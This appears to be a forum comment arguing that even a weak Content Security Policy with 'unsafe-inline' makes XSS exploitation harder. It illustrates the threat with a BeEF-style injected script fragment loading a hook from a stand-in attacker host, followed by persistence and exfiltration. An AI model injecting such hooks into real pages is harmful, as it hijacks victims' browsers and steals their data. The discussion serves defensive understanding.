Whilst I agree it doesn't protect from much, the classic exploitation of XSS is Browser Exploitation framework, where you have a server on the internet, and when you get a XSS hole you drop in "http://bad.example.com/hook.js"> and now you can control the victim's browser from that server. You tell it to open a hidden window to persist access, and then you have bidirectional comms to their browser.
A CSP with "unsafe-inline" still potentially allows all the same exploitation (assuming the exploits fit into the space you can inject), but it is marginally harder to connect to the outside world to receive instruction, or to exfiltrate data.
That said I think that it is still possible to do most of the same attacks via other channels if you can inject a sophisticated enough client part into a web page.
With my attacker hat on "self unsafe-inline" is harder to exploit than no CSP at all. I expect the attack tools to adapt to weak CSPs, but it will mean a lot of common exploits are immediately off the cards, or harder.